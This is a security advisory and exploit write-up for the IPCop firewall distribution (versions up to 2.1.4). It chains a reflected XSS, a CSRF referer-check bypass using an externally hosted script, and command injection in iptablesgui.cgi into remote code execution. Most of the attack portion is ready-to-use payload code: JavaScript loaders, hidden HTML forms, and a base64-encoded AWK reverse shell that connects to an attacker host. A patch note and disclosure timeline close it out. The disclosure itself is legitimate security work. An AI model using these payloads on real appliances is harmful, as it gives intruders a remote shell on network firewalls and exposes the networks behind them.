IPcop versions 2.1.4 and below suffers from cross site request forgery and cross site scripting vulnerabilities.
# Exploit Title: IPCop <= 2.1.4 XSS to CSRF to Remote Command Execution
# Date: 21/12/2014
# Author: Yann CAM @ Synetis - ASafety
# Vendor or Software Link: www.ipcop.org - www.ipcop.org/download.php
# Version: 2.1.4
# Category: Remote Command Execution
# Google dork:
# Tested on: IPCop distribution
IPCop firewall/router distribution description :
IPCop is a Linux distribution which aims to provide a simple-to-manage firewall appliance based on PC hardware. IPCop is a stateful firewall built on the Linux netfilter framework.
Originally a fork of the SmoothWall Linux firewall, the projects are developed independently, and have now diverged significantly.
IPCop includes a simple, user managed update mechanism to install security updates when required.
In version <= 2.1.4 of the distribution, different vulnerabilities can be used to gain a Remote Command Execution (reverse-shell).
In version <= 2.1.2 of the distribution, a Reflected XSS is available. Through this RXSS, the full reverse-shell can be obtained with only one URL.
Proof of Concept 1 :
A non-persistent XSS in GET param is available in the ipinfo.cgi. The injection can be URLencoded with certain browsers.
This XSS works on IE and affect IPCop version <= 2.1.2 (patched in 2.1.3 upgrade).
File /home/httpd/cgi-bin/ipinfo.cgi line 82 :
&Header::openbox('100%', 'left', $addr . ' (' . $hostname . ') : '.$whoisname);
Proof of Concept 2 :
CSRF exploit bypass from previous XSS.
IPCop is protected against CSRF attack with a referer checking on all page.
It's possible to bypass this protection with the previous XSS detailed.
To do this, load a third party JS script with the XSS, and make Ajax request over IPCop context (so with the right referer).
This XSS works on IE and affect IPCop version <= 2.1.2 (patched in 2.1.3 upgrade).
File /home/httpd/cgi-bin/ipinfo.cgi line 82 :
&Header::openbox('100%', 'left', $addr . ' (' . $hostname . ') : '.$whoisname);
PoC :
Host a third party JS script on a web server accessible from IPCop. In this JS script, load JQuery dynamically and perform any AJAX request to an IPCop targeted page.
All AJAX request bypass the CSRF protection.
* Third party JS script, host in http://<PENTESTER_WEBSITE>/x.js:
var headx=document.getElementsByTagName('head')[0];
var jq= document.createElement('script');
jq.type= 'text/javascript';
jq.src= 'http://code.jquery.com/jquery-latest.min.js';
headx.appendChild(jq); // jquery dynamic loading
function loadX(){
type: 'POST',
url: "https://<IPCop_IP>:8443/cgi-bin/<TARGETED_PAGE>",
contentType: 'application/x-www-form-urlencoded;charset=utf-8',
dataType: 'text',
data: '<YOUR_DATA>'
}); // payload of your choice
* XSS to load dynamically this third party script :
var head=document.getElementsByTagName('head')[0];var script= document.createElement('script');script.type= 'text/javascript';script.src= 'http://<PENTESTER_WEBSITE>/x.js';head.appendChild(script);
* Escape this string with escape() Javascript method :
* Make the final URL with XSS in GET param that load dynamically the third party script (IE) :
Proof of Concept 3 :
Remote Command Execution in the iptablesgui.cgi file. This file is protected from CSRF execution.
Affected version <= 2.1.4 (patched in 2.1.5 upgrade).
File /home/httpd/cgi-bin/iptablesgui.cgi line 99 (and also 102) :
$output = `/usr/local/bin/iptableswrapper $cgiparams{'TABLE'} 2>&1`;
The $cgiparams{'TABLE'} isn't sanitized before execution in command line. It's possible to change the "TABLE" post data with arbitrary data.
To chain commands in this instruction, only || are usable (not && nor ;). So the first part of the command needs to return a false status.
It can be done with no additional param :
/usr/local/bin/iptableswrapper <NOTHING HERE> || <my personnal command will be executed here>
So the RCE can be exploited with this PoC (if the Referer is defined to IPCop URL) :
<form name='x' action='https://<IPCop_IP>:8443/cgi-bin/iptablesgui.cgi' method='post'>
<input type='hidden' name='TABLE' value='||touch /tmp/x;#' />
<input type='hidden' name='CHAIN' value='' />
<input type='hidden' name='ACTION' value='Rafra%C3%AEchir' />
Note that the ACTION POST param depend on the IPCop language defined.
Proof of Concept 4 :
Finally, with these three previous PoC, it's possible to combine all the mechanisms to gain a full reverse-shell on IPCop.
IPCop does not have netcat nor telnet, socat, python, ruby, php etc ...
The only way to make a reverse-shell is to use Perl or AWK technics. In this PoC, it's the AWK technic that is used :
(From ASafety Reverse-shell cheat-sheet : http://www.asafety.fr/vuln-exploit-poc/pentesting-etablir-un-reverse-shell-en-une-ligne/)
* The reverse-shell one-line with AWK is :
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
* To bypass IPCop filter, you need to encode this command in base64 (after modify <IP> and <PORT>) :
* Place a \n at each bloc of 64 chars in the base64 version :
* This payload can be echo'ed and decoded with openssl, on the fly, into IPCop :
echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d
* To execute this payload, add backticks and eval call :
eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d`
* Your payload is ready to be used into TABLE POST param in iptablesgui.cgi, like the previous PoC :
||eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d`;#
* Full PoC (IPCop <= 2.1.2, RXSS patched in 2.1.3 upgrade but RCE available to 2.1.4, patched in 2.1.5 upgrade)
(if the referer is defined to IPCop URL, and a netcat is listening # nc -l -vv -p 1337) :
<form name='x' action='https://<IPCop_IP>:8443/cgi-bin/iptablesgui.cgi' method='post'>
<input type='hidden' name='TABLE' value='||eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d`;#' />
<input type='hidden' name='CHAIN' value='' />
<input type='hidden' name='ACTION' value='Rafra%C3%AEchir' />
Note that none <IP>/<Port> are defined in the previous payload, you need to reproduce these different steps.
* With the XSS method to bypass CSRF Referer checking, the third party JS script can be :
var headx=document.getElementsByTagName('head')[0];
var jq= document.createElement('script');
jq.type= 'text/javascript';
jq.src= 'http://code.jquery.com/jquery-latest.min.js';
function loadX(){
type: 'POST',
url: "https://<IPCop_IP>:8443/cgi-bin/iptablesgui.cgi",
contentType: 'application/x-www-form-urlencoded;charset=utf-8',
dataType: 'text',
data: 'CHAIN=&ACTION=Rafra%C3%AEchir&TABLE=%7C%7Ceval+%60echo+-e+%22YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA%22%22+%7C+openssl+enc+-a+-d%60%3B%23'
* A demonstration video has been realised as PoC here (IPCop 2.0.6 but work on IPCop 2.1.2) : https://www.youtube.com/watch?v=ovhogZGHyMg
- To patch the RXSS, install IPCop >= 2.1.3 or upgrade to 2.1.3.
- To patch the RCE, install IPCop >= 2.1.5 or upgrade to 2.1.5.
Report timeline :
2013-03-31 : Team alerted with details, PoC and video (via Sourceforge)
2013-04-09 : Second alert sent to the team (via Sourceforge)
2013-04-25 : Third alert sent to the IPCop english support forum
2013-04-25 : PoC added in private on the sourceforge bug tracker, no response
2013-04-30 : Ticket priority change from 5 to 8, no response.
2014-02-13 : IPCop 2.1.1 released, RXSS not fixed, RCE not fixed, no news on ticket.
2014-03-03 : IPCop 2.1.2 released, RXSS not fixed, RCE not fixed, no news on ticket.
2014-04-03 : IPCop 2.1.3 released, RXSS fixed, RCE not fixed, no news on ticket.
2014-04-08 : IPCop 2.1.4 released, RXSS fixed, RCE not fixed, no news on ticket.
2014-05-02 : IPCop 2.1.5 released, RXSS fixed, RCE fixed, no news on ticket.
2014-12-21 : Public article on ASafety and public advisory
Additional resources :
- www.ipcop.org
- sourceforge.net/p/ipcop/bugs/807/
- sourceforge.net/projects/ipcop/
- www.synetis.com
- www.asafety.fr
- www.asafety.fr/vuln-exploit-poc/xss-rce-ipcop-2-1-4-remote-command-execution
- www.youtube.com/watch?v=ovhogZGHyMg
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8888 Consulting firm in management and information security
Yann CAM - Security Consultant @ Synetis | ASafety
CONTACT: www.synetis.com | www.asafety.fr